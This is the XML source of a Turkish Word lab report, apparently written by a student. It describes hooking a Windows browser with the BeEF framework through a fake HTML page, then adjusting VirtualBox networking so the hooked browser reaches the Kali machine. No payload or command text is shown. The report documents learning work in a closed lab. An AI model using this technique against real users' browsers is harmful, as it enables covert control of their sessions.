            <wp:docPr id="1193701172" name="" descr="Picture 4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284e622d24d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E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="77C921F2" w14:textId="1243795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6B0E84C0">
        <w:drawing>
          <wp:inline wp14:editId="4A2CEA23" wp14:anchorId="1CD3BD1E">
            <wp:extent cx="5029200" cy="2838450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="568625029" name="" descr="Picture 5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bfb1c0f85446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E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="62930BD1" w14:textId="51756347">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="480" w:after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4.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Sahte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Sayfayı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Tarayıcıda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Açma</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6B0E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="3421103D" w14:textId="5B359B5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Hazırladığım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HTML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sayfasını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Windows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sistemdeki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tarayıcıda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açarak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hook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işleminin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başarılı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olup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olmadığını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test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ettim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.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Sayfa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düzgün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yüklendi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ancak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Türkçe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karakterlerde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bozulmalar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gözlemledim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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6B0E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="6AF0826B" w14:textId="1AD280C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6B0E84C0">
        <w:drawing>
          <wp:inline wp14:editId="24CCE00A" wp14:anchorId="0B2FDCEB">
            <wp:extent cx="5029200" cy="2190750"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1434346858" name="" descr="Picture 6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553ed26bec4e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E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="64046619" w14:textId="66631B0E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="480" w:after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5.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Tarayıcının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BeEF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Paneline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Bağlanması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6B0E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="5139D41A" w14:textId="2BBEF53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Hedef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tarayıcının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hazırladığım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sahte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sayfayı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açmasıyla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birlikte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,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BeEF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arayüzünde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bu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tarayıcının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'hooked'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olarak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belirdiğini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gözlemledim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.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Böylece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o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tarayıcı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üzerinde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çeşitli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komutlar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çalıştırabilir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hale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geldim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.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6B0E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="10F7E51D" w14:textId="36311E6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6B0E84C0">
        <w:drawing>
          <wp:inline wp14:editId="10F1C72A" wp14:anchorId="0EF55132">
            <wp:extent cx="5029200" cy="3409950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29520186" name="" descr="Picture 7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7443e2c29c41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28653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="46FAC033" w14:textId="5AC9046C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</w:p>
    <w:p w:rsidR="5384E93B" w:rsidP="20228653" w:rsidRDefault="5384E93B" w14:paraId="37FF9BCF" w14:textId="4939FCB4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="480" w:after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5384E93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6.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VirtualBox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Ağ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Ayarlarımı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Değiştirme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6B0E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="2CBADD7F" w14:textId="2A90982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BeEF’in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sadece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127.0.0.1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üzerinden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değil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,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aynı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zamanda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Kali’nin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yerel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IP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adresiyle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de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erişilebilir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olması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için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VirtualBox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ağ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ayarlarında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‘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Yalnızca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Anamakine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Bağdaştırıcısı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’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modunu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etkinleştirdim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.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Böylece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Windows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tarayıcıdan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Kali’ye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doğrudan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erişim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sağladım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auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6B0E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="0A9A84B6" w14:textId="1EDE1AF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 w:rsidR="6B0E84C0">
        <w:drawing>
          <wp:inline wp14:editId="01FEC88D" wp14:anchorId="37A85D60">
            <wp:extent cx="5029200" cy="2895600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1418265085" name="" descr="Picture 9, Resi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071f0fdc0b4d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E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="5DADDC2D" w14:textId="7AF99883">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="1"/>
        <w:keepLines w:val="1"/>
        <w:spacing w:before="480" w:after="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Sonuç</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="6B0E84C0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4"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6B0E84C0" w:rsidP="20228653" w:rsidRDefault="6B0E84C0" w14:paraId="26AB5C17" w14:textId="18AC4BBA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Bu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uygulama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süresince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BeEF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aracıyla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bir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tarayıcıyı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başarıyla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hookladım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,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yerel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ağ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üzerinden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kontrol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sağlamayı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başardım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ve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BeEF’in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sunduğu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özellikleri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uygulamalı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olarak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deneyimledim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. VirtualBox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ayarları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sayesinde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Kali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ile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Windows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arasında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iletişim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kurarak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başarılı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bir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senaryo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oluşturabildim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. VirtualBox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ayarları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ve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HTML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düzenlemeleri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sayesinde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hem 127.0.0.1 hem de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yerel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IP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üzerinden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başarılı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bağlantılar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gerçekleştirdim</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="6B0E84C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en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="6C0AE413" w14:textId="40383A2E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4"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="54243818" w14:textId="11DFA89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</w:p>
    <w:p w:rsidR="7336FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="1831BA86" w14:textId="503B754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>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="5B464B33" w14:textId="74FF0D40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</w:p>
    <w:p w:rsidR="7336FBF5" w:rsidP="20228653" w:rsidRDefault="7336FBF5" w14:paraId="75E48C3C" w14:textId="09B35CEC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22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="4519AFFF" w14:textId="2ACC7253">
      <w:pPr>
        <w:jc w:val="right"/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</w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="43986DD5" w14:textId="2124DF63">
      <w:pPr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</w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="1A9E496B" w14:textId="5F99AD25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tr-TR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5a19e1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564de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1B29B3"/>
    <w:rsid w:val="00EB465D"/>
    <w:rsid w:val="0282AE5E"/>
    <w:rsid w:val="02F82148"/>
    <w:rsid w:val="04079FF6"/>
    <w:rsid w:val="04EFEC9E"/>
    <w:rsid w:val="05D139CB"/>
    <w:rsid w:val="087AECB9"/>
    <w:rsid w:val="0A40E8FB"/>
    <w:rsid w:val="0AF20554"/>
    <w:rsid w:val="0B9FCEB4"/>
    <w:rsid w:val="0BEAD985"/>
    <w:rsid w:val="0C05C4B0"/>
    <w:rsid w:val="0C1B29B3"/>
    <w:rsid w:val="0D9B35D0"/>
    <w:rsid w:val="0DC0F102"/>
    <w:rsid w:val="0E5765DD"/>
    <w:rsid w:val="0F526820"/>
    <w:rsid w:val="0F63FFB1"/>
    <w:rsid w:val="10F9D085"/>
    <w:rsid w:val="1123CC73"/>
    <w:rsid w:val="11EB8284"/>
    <w:rsid w:val="13491AAB"/>
    <w:rsid w:val="138D4E54"/>
    <w:rsid w:val="141A4607"/>
    <w:rsid w:val="147DE8D5"/>
    <w:rsid w:val="1586599F"/>
    <w:rsid w:val="16155045"/>
    <w:rsid w:val="161696FC"/>
    <w:rsid w:val="17290389"/>
    <w:rsid w:val="17B636AC"/>
    <w:rsid w:val="181F97B5"/>
    <w:rsid w:val="18A346B1"/>
    <w:rsid w:val="196522B9"/>
    <w:rsid w:val="19870075"/>
    <w:rsid w:val="1AAD51F2"/>
    <w:rsid w:val="1B106E91"/>
    <w:rsid w:val="1C7C9757"/>
    <w:rsid w:val="1DFBC397"/>
    <w:rsid w:val="1E4D2C2F"/>
    <w:rsid w:val="1F2DEFC7"/>
    <w:rsid w:val="20228653"/>
    <w:rsid w:val="207C05FA"/>
    <w:rsid w:val="2587464A"/>
    <w:rsid w:val="25C2FA1E"/>
    <w:rsid w:val="265EBE6F"/>
    <w:rsid w:val="266665DD"/>
    <w:rsid w:val="2881F5DD"/>
    <w:rsid w:val="2983BC4F"/>
    <w:rsid w:val="29EF58B3"/>
    <w:rsid w:val="2A13251A"/>
    <w:rsid w:val="2C018EE9"/>
    <w:rsid w:val="2C022135"/>
    <w:rsid w:val="2C73095F"/>
    <w:rsid w:val="2CA45D4C"/>
    <w:rsid w:val="2F13D52C"/>
    <w:rsid w:val="307483A1"/>
    <w:rsid w:val="316B40B3"/>
    <w:rsid w:val="332DE70E"/>
    <w:rsid w:val="34904E7B"/>
    <w:rsid w:val="34A9E3A6"/>
    <w:rsid w:val="3588E7F4"/>
    <w:rsid w:val="363CBF1A"/>
    <w:rsid w:val="36B368B1"/>
    <w:rsid w:val="36DCA6CA"/>
    <w:rsid w:val="392251AE"/>
    <w:rsid w:val="3961EB34"/>
    <w:rsid w:val="3CDBAEAE"/>
    <w:rsid w:val="3DE28D23"/>
    <w:rsid w:val="3E32D33A"/>
    <w:rsid w:val="3FA35211"/>
    <w:rsid w:val="412A2951"/>
    <w:rsid w:val="420F49EC"/>
    <w:rsid w:val="42A291D1"/>
    <w:rsid w:val="42A60243"/>
    <w:rsid w:val="4387FF38"/>
    <w:rsid w:val="43D75964"/>
    <w:rsid w:val="44D07B65"/>
    <w:rsid w:val="455FB608"/>
    <w:rsid w:val="46E05E6B"/>
    <w:rsid w:val="46E71072"/>
    <w:rsid w:val="47C6C6D5"/>
    <w:rsid w:val="493E4A2E"/>
    <w:rsid w:val="49F0750D"/>
    <w:rsid w:val="4E824B3C"/>
    <w:rsid w:val="4F096E74"/>
    <w:rsid w:val="4F704198"/>
    <w:rsid w:val="504A4F35"/>
    <w:rsid w:val="50623CD4"/>
    <w:rsid w:val="513C6932"/>
    <w:rsid w:val="51C1143C"/>
    <w:rsid w:val="5384E93B"/>
    <w:rsid w:val="53F87F0A"/>
    <w:rsid w:val="54CE42F7"/>
    <w:rsid w:val="56DEA86C"/>
    <w:rsid w:val="57223096"/>
    <w:rsid w:val="58395CD4"/>
    <w:rsid w:val="5A8D84C0"/>
    <w:rsid w:val="5AD61A4F"/>
    <w:rsid w:val="5F74C1F8"/>
    <w:rsid w:val="63837458"/>
    <w:rsid w:val="647B36A1"/>
    <w:rsid w:val="649C1435"/>
    <w:rsid w:val="65CC3C3F"/>
    <w:rsid w:val="6616C595"/>
    <w:rsid w:val="67D060C0"/>
    <w:rsid w:val="68A36B52"/>
    <w:rsid w:val="69472683"/>
    <w:rsid w:val="69C4896E"/>
    <w:rsid w:val="6A538447"/>
    <w:rsid w:val="6B0286E6"/>
    <w:rsid w:val="6B0E84C0"/>
    <w:rsid w:val="6B6F20B7"/>
    <w:rsid w:val="6D0F1780"/>
    <w:rsid w:val="6EF7979D"/>
    <w:rsid w:val="6F815934"/>
    <w:rsid w:val="7089BC18"/>
    <w:rsid w:val="7096B168"/>
    <w:rsid w:val="719B5DA5"/>
    <w:rsid w:val="72E2F59E"/>
    <w:rsid w:val="7336FBF5"/>
    <w:rsid w:val="7340BACF"/>
    <w:rsid w:val="7383B586"/>
    <w:rsid w:val="766E6E84"/>
    <w:rsid w:val="767B7DE1"/>
    <w:rsid w:val="77509380"/>
    <w:rsid w:val="781282CB"/>
    <w:rsid w:val="7A30D805"/>
    <w:rsid w:val="7AB01F75"/>
    <w:rsid w:val="7B396C1C"/>
    <w:rsid w:val="7BA72A04"/>
    <w:rsid w:val="7BAAB1D2"/>
    <w:rsid w:val="7BE5B67A"/>
    <w:rsid w:val="7C2A4C72"/>
    <w:rsid w:val="7C82BB87"/>
    <w:rsid w:val="7D137385"/>
    <w:rsid w:val="7D98BD1B"/>
    <w:rsid w:val="7E47A966"/>
    <w:rsid w:val="7EF4BD2B"/>
    <w:rsid w:val="7F286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B29B3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1A2EBE48-7E55-4E5F-A884-2555CBA6645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tr-T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20228653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20228653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1">
    <w:uiPriority w:val="9"/>
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="20228653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de2419fedac4136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.png" Id="Ra857b19826e74c7f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.png" Id="Rac0cf0238d4a4fe0" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.png" Id="Rc2a11a7020fe472a" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.png" Id="R776dee8c2bc64aa7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.png" Id="R9a83923b5b2347f8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.png" Id="Ra11f2c1b4a194776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.png" Id="R7a6f988b8faa4efb" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.png" Id="R57b40e38493c478b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.png" Id="Ra3885c3be48e4a5d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.png" Id="R18c71aae6f124b8e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.png" Id="R8144374c7f2c4e3f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imaged.png" Id="R0f47e40ee6824019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagee.png" Id="Rf613e71c6c694ff4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagef.png" Id="R48b7b63df44f42e9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image10.png" Id="Ra5b08bc0edb34fa3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image11.png" Id="Rc61a6cf1bdf240c4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image12.png" Id="Rc7371f58e3de4c8b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image13.png" Id="R2b7d6f9712f348d9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image14.png" Id="R867ef221a51f4b88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image15.png" Id="Rdc39de2b616a4006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image16.png" Id="Rb9e594e2bf7e4c04" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image17.png" Id="Rb2372e89b78e4ea6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image18.png" Id="Rba92e64056cb4835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image19.png" Id="Ra4b7b76904194244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1a.png" Id="Rcc1c440777ce41b8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1b.png" Id="R10e7951398114fd2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1c.png" Id="R14371db2ee7949c2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image.jpg" Id="R711f5cd946184f68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image2.jpg" Id="R805efffc94564e56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image3.jpg" Id="Rbbee797ea0894307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image4.jpg" Id="Rb6f30ea2c3914472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image5.jpg" Id="R7eb0df493c23406c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image6.jpg" Id="R8e8cc9e7616d4aaa" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image7.jpg" Id="R6ed33bdd56cd45ab" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image8.jpg" Id="R150e7d26f1cf4c1b" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image9.jpg" Id="Rba7ee919a59e4443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagea.jpg" Id="R273ed4f601054643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imageb.jpg" Id="R3b5e4afc7bd8407e" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagec.jpg" Id="R2b6d76a21879445d" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imaged.jpg" Id="Rc2e6a8e9b7994cee" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/imagee.jpg" Id="R2f2b2054e44f4935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1d.png" Id="R871398188de44b42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1e.png" Id="Rc86d0eccfac74840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image1f.png" Id="R86bb70953263446f" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image20.png" Id="Rbaa284e622d24d67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image21.png" Id="Rf8bfb1c0f8544604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image22.png" Id="R96553ed26bec4ebe" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image23.png" Id="R247443e2c29c414c" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="/media/image24.png" Id="Rd0071f0fdc0b4d66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml" Id="R061258823d81462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2025-06-02T07:21:31.0248460Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-02T18:20:44.6363453Z</dcterms:modified>
  <dc:creator>Hilal Öklük</dc:creator>
  <lastModifiedBy>Hilal Öklük</lastModifiedBy>
</coreProperties>
</file>